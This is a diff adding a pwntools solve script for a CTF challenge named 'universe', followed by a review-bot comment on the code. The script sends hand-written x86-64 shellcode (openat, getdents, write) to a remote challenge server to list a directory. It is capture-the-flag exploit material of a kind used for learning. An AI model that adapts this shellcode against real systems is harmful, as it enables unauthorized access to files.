diff --git a/africabattlectf_2024/universe/read_files.py b/africabattlectf_2024/universe/read_files.py
new file mode 100644
index 0000000..e1223f6
--- /dev/null
+++ b/africabattlectf_2024/universe/read_files.py
@@ -0,0 +1,34 @@
+#!/usr/bin/python3
+
+from pwn import *
+
+context.binary = target = ELF("./universe", checksec=False)
+# r = process()
+r = remote("challenge.bugpwn.com", 1004)
+
+# openat + getdents + write
+shellcode="""
+mov r9, [rsp]
+sub r9, 0x1370
+add r9, 0x4500
+mov r15, 0x2f
+push r15
+lea rsi, [rsp]
+xor rdx, rdx
+xor r10, r10
+add ax, 257
+syscall
+mov edi, eax
+mov al, 78
+mov rsi, r9
+mov dx, 1000
+syscall
+mov edi, 1
+mov eax, 1
+syscall
+"""
+shellcode = asm(shellcode)
+shellcode += b"\x90"*(4096-len(shellcode))
+r.sendline(shellcode)
+
+r.interactive()
\ No newline at end of file
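Review bot: The shellcode's hard-coded values are undocumented assumptions about the remote process — `sub r9, 0x1370` / `add r9, 0x4500` encode a fixed distance from whatever `[rsp]` holds at entry, and `add ax, 257` only produces the intended syscall number if the rest of rax is already zero when the payload starts; the one comment, `# openat + getdents + write`, names the syscalls but says nothing about these preconditions. A header comment above `shellcode="""` along the lines of `# Assumes rax == 0 and a fixed stack layout at entry; the 0x1370/0x4500 offsets are presumably specific to this build of ./universe — re-derive before reuse` would let a reader check the assumptions instead of rediscovering them. The `target` name bound on the `context.binary` line is never used, and `checksec=False` hides the mitigation summary that would explain why a plain NOP-padded payload is expected to work; either drop `target` or reference it. The commented-out `# r = process()` is dead code and should be removed or turned into a documented local/remote switch.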